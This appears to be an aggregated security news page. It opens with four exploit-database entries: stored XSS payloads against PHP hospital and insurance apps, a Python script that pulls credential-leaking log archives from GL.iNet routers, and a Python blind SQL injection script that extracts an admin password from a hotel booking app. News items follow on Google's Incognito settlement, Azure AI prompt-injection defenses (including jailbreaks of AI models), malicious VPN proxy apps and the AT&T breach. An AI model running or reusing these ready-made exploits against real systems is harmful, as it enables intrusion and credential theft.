Hospital Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://code-projects.org# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/# Version: v1.0# Tested on: Windows 10# CVE : CVE-2024-29412# Description: Stored Cross Site Scripting vulnerability inHospital Management System - v1.0 allows an attacker to execute arbitrarycode via a crafted payload to the 'patient_id','first_name','middle_initial' ,'last_name'" in /receptionist.php component.# POC:1. Go to the User Login page: "http://localhost/HospitalManagementSystem-gh-pages/2. Login with "r1" ID which is redirected to "http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"endpoint.3. In Patient information functionality add this payload"><script>alert('1')</script> ,in all parameter.4. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md

Hospital Management System 1.0 Cross Site Scripting

E-Insurance version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html# Version: v1.0# Tested on: Windows 10# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -v1.0 allows an attacker to execute arbitrary code via a crafted payload tothe Firstname and lastname parameter in the profile component.# POC:1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile2. In fname & lname parameter add payolad"><script>alert("Hacked_by_Sandy")</script>3. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

E-Insurance 1.0 Cross Site Scripting

GL-iNet MT6000 version 4.5.5 suffers from an arbitrary file download vulnerability.

    # Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download# CVE: CVE-2024-27356# Google Dork: intitle:"GL.iNet Admin Panel"# Date: 2/26/2024# Exploit Author: Bandar Alharbi (aggressor)# Vendor Homepage: www.gl-inet.com# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin# Tested Model: GL-X3000 Spitz AX# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.mdimport sysimport requestsimport jsonrequests.packages.urllib3.disable_warnings()h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}def DoesTarExist():    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)    if r.status_code == 200:        f = open("logread.tar", "wb")        f.write(r.content)        f.close()        print("[*] Full logs archive `logread.tar` has been downloaded!")        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")        return True    else:        print("[*] The `logread.tar` archive does not exist however ... try again later!")        return Falsedef isVulnerable():    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)    if r1.status_code == 500 and "nginx" in r1.text:        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)        if  "Admin-Token" in r2.text:            j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)            ver = r3.json()['result']['firmware_version']            model = r3.json()['result']['model']            if ver.startswith(('4.')):                print("[*] Firmware version (%s) is vulnerable!" %ver)                print("[*] Device model is: %s" %model)                return True    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")    return Falsedef isAlive():    try:        r = requests.get(url, verify=False, timeout=30, headers=h)        if r.status_code != 200:            print("[*] Make sure the target's web interface is accessible!")            return False        elif r.status_code == 200:            print("[*] The target is reachable!")            return True    except Exception:        print("[*] Error occurred when connecting to the target!")        pass    return Falseif __name__ == '__main__':    if len(sys.argv) != 2:        print("exploit.py url")        sys.exit(0)    url = sys.argv[1]    url = url.lower()    if not url.startswith(('http://', 'https://')):        print("[*] Invalid url format! It should be http[s]://<domain or ip>")        sys.exit(0)    if url.endswith("/"):        url = url.rstrip("/")    print("[*] GL.iNet Unauthenticated Full Logs Downloader")    try:        if (isAlive() and isVulnerable()) == (True and True):            DoesTarExist()    except KeyboardInterrupt:        print("[*] The exploit has been stopped by the user!")        sys.exit(0)

GL-iNet MT6000 4.5.5 Arbitrary File Download

Online Hotel Booking in PHP version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title:  Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)# Google Dork: n/a# Date: 04/02/2024# Exploit Author: Gian Paris C. Agsam# Vendor Homepage: https://github.com/projectworldsofficial# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip# Version: 1.0# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12# CVE : n/aimport requestsimport argparsefrom colorama import (Fore as F, Back as B, Style as S)BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITErequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')parser.add_argument('-u', '--url', help='')args = parser.parse_args()def banner():    print(f"""{FR}      ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄  ▄▄▄        ▪  ·▄▄▄▄  ▪     ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪     ██ ██▪ ██  ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄  ▄█▀▄ ▐█·▐█· ▐█▌▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██  ▀█▄▀▪▀▀▀ ▀▀▀  ▀▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•         Github: https://github.com/offensive-droid         {FW}    """)# Define the characters to testchars = [    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',    'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',    'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',    '8', '9', '@', '#']def sqliPayload(char, position, userid, column, table):    sqli = 'admin\' UNION SELECT IF(SUBSTRING('    sqli += str(column) + ','    sqli += str(position) + ',1) = \''    sqli += str(char) + '\',sleep(3),null) FROM '    sqli += str(table) + ' WHERE uname="admin"\''    return sqlidef postRequest(URL, sqliReq, char, position):    sqliURL = URL    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)    if req.elapsed.total_seconds() >= 2:        print("{} : {}".format(char, req.elapsed.total_seconds()))        return char    return ''def theHarvester(target, CHARS, url):    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))    print("Retrieving admin password".format(target['table'], target['column'], target['id']))    position = 1    full_pass = ""    while position < 5:        for char in CHARS:            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])            found_char = postRequest(url, sqliReq, char, position)            full_pass += found_char        position += 1    return full_passif __name__ == "__main__":    banner()    HOST = str(args.url)    PATH = HOST + "/hotel booking/admin/login.php"    adminPassword = {"id": "1", "table": "manager", "column": "upass"}    adminPass = theHarvester(adminPassword, chars, PATH)    print("Admin Password:", adminPass)

Online Hotel Booking In PHP 1.0 SQL Injection

Google has agreed to purge billions of data records reflecting users' browsing activities to settle a class action lawsuit that claimed the search giant tracked them without their knowledge or consent in its Chrome browser.
The class action, filed in 2020, alleged the company misled users by tracking their internet browsing activity who thought that it remained private when using the "

Google to Delete Billions of Browsing Records in 'Incognito Mode' Privacy Lawsuit Settlement

Microsoft adds tools to protect Azure AI from threats such as prompt injection, as well as to give developers the capabilities to ensure generative AI apps are more resilient to model and content manipulation attacks.

Source: Tada Images via Shutterstock

Microsoft has announced several new capabilities in Azure AI Studio that the company says should help developers build generative artificial intelligence (GenAI) apps that are more reliable and resilient against malicious model manipulation and other emerging threats.

In a March 29 blog post, Microsoft's chief product officer of responsible AI, Sarah Bird, pointed to growing concerns about threat actors using prompt injection attacks to get AI systems to behave in dangerous and unexpected ways as the primary driving factor for the new tools.

"Organizations are also concerned about quality and reliability," Bird said. "They want to ensure that their AI systems are not generating errors or adding information that isn’t substantiated in the application’s data sources, which can erode user trust."

Azure AI Studio is a hosted platform that organizations can use to build custom AI assistants, copilots, bots, search tools and other applications, grounded in their own data. Announced in November, the platform hosts Microsoft's machine learning models, as well as models from several other sources, including OpenAI, Meta, Hugging Face, and Nvidia. It allows developers to quickly integrate multimodal capabilities and responsible AI features into their models.

Other major players, such as Amazon and Google, have rushed to market with similar offerings over the past year to tap into the surging interest in AI technologies worldwide. A recent IBM-commissioned study found that 42% of organizations with more than 1,000 employees are already actively using AI in some fashion, with many of them planning to increase and accelerate investments in the technology over the next few years. And not all of them were telling IT beforehand about their AI use.

**Protecting Against Prompt Engineering**

The five new capabilities that Microsoft has added — or will soon add — to Azure AI Studio are Prompt Shields, groundedness detection, safety system messages, safety evaluations, and risk and safety monitoring. The features are designed to address some significant challenges that researchers have uncovered recently — and continue to uncover on a routine basis — with regard to the use of large language models (LLMs) and GenAI tools.

Prompt Shields, for instance, is Microsoft's mitigation for what are known as indirect prompt attacks and jailbreaks. The feature builds on existing mitigations in Azure AI Studio against jailbreak risk. In prompt-engineering attacks, adversaries use prompts that appear innocuous and not overtly harmful to try and steer an AI model into generating harmful and undesirable responses. Prompt engineering is among the most dangerous in a growing class of attacks that try to jailbreak AI models or get them to behave in a manner that is inconsistent with any filters and constraints that developers might have built into them.  

Researchers have recently shown how adversaries can engage in prompt-engineering attacks to get GenAI models to spill their training data, spew out personal information, generate misinformation, and potentially harmful content, such as instructions on how to hot-wire a car.

With Prompt Shields, developers can integrate capabilities into their models that help distinguish between valid and potentially untrustworthy system inputs, set delimiters to help mark the beginning and end of input text, and use data marking to mark input texts. Prompt Shields is currently available in preview mode in Azure AI Content Safety and will become generally available soon, according to Microsoft.

**Mitigations for Model Hallucinations and Harmful Content**

With groundedness detection, Microsoft has added a feature to Azure AI Studio that it says can help developers reduce the risk of their AI models "hallucinating." Model hallucination is a tendency by AI models to generate results that appear plausible but are completely made up and not based — or grounded — on the training data. LLM hallucinations can be hugely problematic if an organization were to take the output as factual and act on it in some way. In a software development environment, for instance, LLM hallucinations could result in developers potentially introducing vulnerable code into their applications.

Azure AI Studio's new groundedness-detection capability is basically about helping detect — more reliably and at greater scale — potentially ungrounded GenAI outputs.  The goal is to give developers a way to test their AI models against what Microsoft calls "groundedness metrics" before deploying the model into their products. The feature also highlights potentially ungrounded statements in LLM outputs, so users know to fact check the output before using it. Groundedness detection should be available in the near future, according to Microsoft.

The new system message framework offers a way for developers to clearly define their models' capabilities, profile, and limitations in their specific environments. Developers can use the capability to define the format of the output and provide examples of intended behavior, so it becomes easier for users to detect deviations from intended behavior. The feature isn't available yet but should be soon.

Azure AI Studio's newly announced safety evaluations capability and its risk and safety monitoring feature are both currently available in preview status. Organizations can use the former to assess the vulnerability of their LLM models to jailbreak attacks and generate unexpected content. The risk and safety monitoring capability allows developers to detect model inputs that are problematic and likely to trigger hallucinated or unexpected content, so they can implement mitigations against it.

"Generative AI can be a force multiplier for every department, company, and industry," Microsoft's Bird said. "At the same time, foundation models introduce new challenges for security and safety that require novel mitigations and continuous learning."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Microsoft Beefs Up Defenses in Azure AI

To settle a years-long lawsuit, Google has agreed to delete “billions of data records” collected from users of “Incognito mode,” illuminating the pitfalls of relying on Chrome to protect your privacy.

If you still hold any notion that Google Chrome’s “Incognito mode” is a good way to protect your privacy online, now’s a good time to stop.

Google has agreed to delete “billions of data records” the company collected while users browsed the web using Incognito mode, according to documents filed in federal court in San Francisco on Monday. The agreement, part of a settlement in a class action lawsuit filed in 2020, caps off years of disclosures about Google’s practices that shed light on how much data the tech giant siphons from its users—even when they’re in private-browsing mode.

Under the terms of the settlement, Google must further update the Incognito mode “splash page” that appears anytime you open an Incognito mode Chrome window after previously updating it in January. The Incognito splash page will explicitly state that Google collects data from third-party websites “regardless of which browsing or browser mode you use,” and stipulate that “third-party sites and apps that integrate our services may still share information with Google,” among other changes. Details about Google’s private-browsing data collection must also appear in the company’s privacy policy.

Additionally, some of the data that Google previously collected on Incognito users will be deleted. This includes “private-browsing data” that is “older than nine months” from the date that Google signed the term sheet of the settlement last December, as well as private-browsing data collected throughout December 2023. Certain documents in the case referring to Google's data collection methods remain sealed, however, making it difficult to assess how thorough the deletion process will be.

Google spokesperson Jose Castaneda says in a statement that the company “is happy to delete old technical data that was never associated with an individual and was never used for any form of personalization.” Castaneda also noted that the company will now pay “zero” dollars as part of the settlement after earlier facing a $5 billion penalty.

Other steps Google must take will include continuing to “block third-party cookies within Incognito mode for five years,” partially redacting IP addresses to prevent re-identification of anonymized user data, and removing certain header information that can currently be used to identify users with Incognito mode active.

The data-deletion portion of the settlement agreement follows preemptive changes to Google’s Incognito mode data collection and the ways it describes what Incognito mode does. For nearly four years, Google has been phasing out third-party cookies, which the company says it plans to completely block by the end of 2024. Google also updated Chrome’s Incognito mode “splash page” in January with weaker language to signify that using Incognito is not “private,” but merely “more private” than not using it.

The settlement's relief is strictly “injunctive,” meaning its central purpose is to put an end to Google activities that the plaintiffs claim are unlawful. The settlement does not rule out any future claims—_The Wall Street Journal_ reports that the plaintiffs’ attorneys had filed at least 50 such lawsuits in California on Monday—though the plaintiffs note that monetary relief in privacy cases is far more difficult to obtain. The important thing, the plaintiffs’ lawyers argue, is effecting changes at Google now that will provide the greatest, immediate benefit to the largest number of users.

Critics of Incognito, a staple of the Chrome browser since 2008, say that, at best, the protections it offers fall flat in the face of the sophisticated commercial surveillance bearing down on most users today; at worst, they say, the feature fills people with a false sense of security, helping companies like Google passively monitor millions of users who've been duped into thinking they're browsing alone.

The Incognito Mode Myth Has Fully Unraveled

Researchers have uncovered a campaign that turns Android phones into proxy nodes for malicious purposes.

Researchers at HUMAN’s Satori Threat Intelligence have discovered a disturbing number of VPN apps that turn users’ devices into proxies for cybercriminals without their knowledge, as part of a camapign called PROXYLIB.

Cybercriminals and state actors like to send their traffic through other people’s devices, known as proxies. This allows them to use somebody else’s resources to get their work done, it masks the origin of their attacks so they are less likely to get blocked, and it makes it easy for them to keep operating if one of their proxies is blocked.

An entire underground market of proxy networks exists to service this desire, offering cybercriminals flexible, scalable platfroms from which to launch activities like advertising fraud, password spraying, and credential stuffing attacks.

The researchers at HUMAN found 28 apps on Google Play that turned unsuspecting Android devices into proxies for criminals. 17 of the apps were free VPNs. All of them have now been removed from Google Play.

The operation was dubbed PROXYLIB after a code library shared by all the apps that was responsible for enrolling devices into the ciminal network.

HUMAN also found hundreds of apps in third-party repositories that appeared to use the LumiApps toolkit, a Software Development Kit (SDK) which can be used to load PROXYLIB. They also tied PROXYLIB to another platform that specializes in selling access to proxy nodes, called Asocks.

**Protection and removal**

Android users are now automatically protected from the PROXYLIB attack by Google Play Protect, which is on by default on Android devices with Google Play Services.

The affected apps can be uninstalled using a mobile device’s uninstall functionality. However, apps like these may be made available under different names in future, which is where apps like Malwarebytes for Android can help.

Recommendations to stay clear of PROXYLIB are:

*   Do not install apps from third-party websites.
*   Do not install free VPNs.
*   Use Malwarebytes for Android.

Victims of novel attacks like PROXYLIB might notice slow traffic, because their bandwidth is in use for other purposes. And at some point their IP address may be blocked by websites and other services.

The researchers included a list of applications they uncovered as part of PROXYLIB. If you installed any of the apps on the list before they were removed from Google Play you will need to uninstall them.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Free VPN apps turn Android phones into criminal proxies 

By Waqas
Corrected text: Another day, another massive data breach affecting critical infrastructure in the United States!
This is a post from HackRead.com Read the original post: After Denial, AT&T Confirms Data Breach Affecting 73 Million Users

Millions of AT&T customers are questioning the company’s transparency, after the telecom giant finally confirmed a massive data breach impacting a staggering 73 million current and former customers.

AT&T has finally confirmed a massive data breach impacting a whopping 73 million (73,481,539) current and former customers. This comes after weeks of speculation and accusations of a cover-up following the discovery of the leaked data on the the notorious hacking and cyber crime platform **BreachForums**.

The data breach, which involved Social Security numbers, passcodes, and potentially other personal information, was first discovered in mid-March. Cybersecurity researchers immediately noted similarities to a possible breach from 2021 that AT&T never acknowledged.

AT&T database on BreachForums (Screenshot: Hackread.com)

****Initial Denial and Mounting Pressure****

The data was leaked on Sunday March 17, 2024. However, AT&T initially denied any data breaches, despite reports from security researchers like Troy Hunt, founder of Have I Been Pwned. Hunt pointed out that the leaked data closely resembled a breach from 2021 that was **attempted to be sold** online by a hacker known as “**Shiny Hunters**.”

This denial raised concerns about AT&T’s transparency and potential legal ramifications. Experts pointed out that failing to disclose a data breach promptly could violate consumer protection laws.

****Confirmation and Investigation****

Under mounting pressure, AT&T finally **confirmed** the data breach on March 30th. The company stated they were unaware of the source of the breach, suggesting it could have originated from AT&T’s systems or a vendor.

They also announced that they had already reset passcodes for current users and would be reaching out to impacted individuals. Additionally, AT&T will be offering complimentary identity theft and credit monitoring services.

****Lingering Questions****

While AT&T has confirmed the breach, questions remain.

*   Why did it take so long for AT&T to acknowledge the breach, especially considering the potential similarities to the 2021 incident?
*   What specific data was compromised, and how will it impact affected customers?
*   Is AT&T conducting a thorough investigation to identify the source of the breach and prevent future incidents?

AT&T has yet to address these questions publicly. It’s likely that the company will face lawsuits and regulatory scrutiny in the coming months.

This data breach goes onto show the importance of cybersecurity and data protection. Consumers should remain vigilant and take steps to protect their personal information, such as monitoring credit reports and using strong, unique passwords.

1.  ShinyHunters dump partial database of broker firm Upstox
2.  Online exam tool ProctorU admits breach by Shiny Hunters
3.  ShinyHunters leaks 5.22GB worth of Mashable.com database
4.  Minted confirms data breach as Shiny Hunters sell its database
5.  Google funded delivery service Dunzo hacked by Shiny Hunters

After Denial, AT&T Confirms Data Breach Affecting 73 Million Users

Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store.
The findings come from HUMAN's Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user's device into a proxy node without their knowledge.

Tag

#google